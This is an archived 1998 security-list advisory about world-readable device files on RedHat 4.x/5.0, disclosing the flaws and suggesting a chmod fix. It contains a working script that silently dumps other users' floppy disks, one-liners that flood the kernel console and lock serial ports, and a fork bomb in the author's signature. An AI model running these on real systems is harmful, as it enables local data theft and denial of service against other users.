The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


RedHat 4.x/5.0 /dev permissions


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Thu, 05 Feb 1998 12:17:24 +0500 (ESK)
Date: Wed, 4 Feb 1998 09:45:37 +0100
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <[email protected]>
To: [email protected]
Subject: RedHat 4.x/5.0 /dev permissions

First one
----------

Any user can read data from (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
may write a script, which periodically checks if floppy has been
just unmounted, then dumps it's content to a file. Here's a sample
'floppy collector':

-- fdumper --
#!/bin/sh
DUMP_DEV=/dev/fd0H1440
MOUNT_DEV=/dev/fd0
LABEL=0
DUMPED=1
while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
    if [ "$DUMPED" = "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=LABEL+1
      DUMPED=1
    fi
  else
    DUMPED=0
  fi
done
-- eof --

Also, if there's no floppy in drive, unprivledged user may flood
kernel log console (local console by default!!!):

[user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to console (default klogd behaviour). Also,
every printk(...) (called by fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.

Second one
-----------
(not tested with rh 5.0)

Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
disallows multiple access attempts at the same time, so user may
permanently lock choosen port using this command:

[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now serial port is in unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, eg. /dev/sequencer,
which are world-readable or even world-writable.

There's no ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain an interesting
data or cause system failure by reading/writing these devices.

Solution...
------------

ls -l /dev/* | grep "r-- "
chmod ;)

_______________________________________________________________________
Micha³ Zalewski [tel 9690] | finger 4 PGP [[email protected]]
Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



ðÁÒÔΣÒÙ:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
èÏÓÔÉÎÇ:

úÁËÌÁÄËÉ ÎÁ ÓÁÊÔÅ
ðÒÏÓÌÅÄÉÔØ ÚÁ ÓÔÒÁÎÉÃÅÊ
Created 1996-2024 by Maxim Chirkov
äÏÂÁ×ÉÔØ, ðÏÄÄÅÒÖÁÔØ, ÷ÅÂÍÁÓÔÅÒÕ